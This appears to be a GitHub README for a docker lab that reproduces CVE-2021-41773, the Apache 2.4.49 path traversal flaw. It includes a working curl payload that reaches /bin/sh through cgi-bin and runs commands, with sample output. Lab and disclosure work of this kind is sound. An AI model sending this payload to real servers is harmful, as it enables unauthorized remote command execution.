CVE-2021-41773 vulnerability

Path traversal vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)

For educational purposes only

Test

Set up the PoC environment

Option 1: From GitHub Container Registry

$ docker run --rm -dit -p 8000:80 ghcr.io/hbertsch/cve-2021-41773

Option 2: Manual Build

$ docker build -t cve-2021-41773 . 
$ docker run --rm -dit -p 8000:80 cve-2021-41773

Confirm it works

Check whether the server is running

$ curl http://localhost:8000
# Result
<html><body><h1>It works!</h1></body></html>

Exploit

Send any command you want like this:

$curl 'http://127.0.0.1:8000/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'echo;ls'
# Result
bash
cat
chgrp
chmod
chown
cp
dash
date
dd
df
dir
dmesg
dnsdomainname
domainname
echo
egrep
false
fgrep
findmnt
grep
gunzip
gzexe
gzip
hostname
ln
login
...

References

https://httpd.apache.org/security/vulnerabilities_24.html
https://github.com/apache/httpd/commit/98246aa96079dad5f7b20521bbc0142a04f1c5e7

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

README.md

README.md

CVE-2021-41773 vulnerability

Test

Set up the PoC environment

Option 1: From GitHub Container Registry

Option 2: Manual Build

Confirm it works

Exploit

References

Files

README.md

Latest commit

History

README.md

File metadata and controls

CVE-2021-41773 vulnerability

Test

Set up the PoC environment

Option 1: From GitHub Container Registry

Option 2: Manual Build

Confirm it works

Exploit

References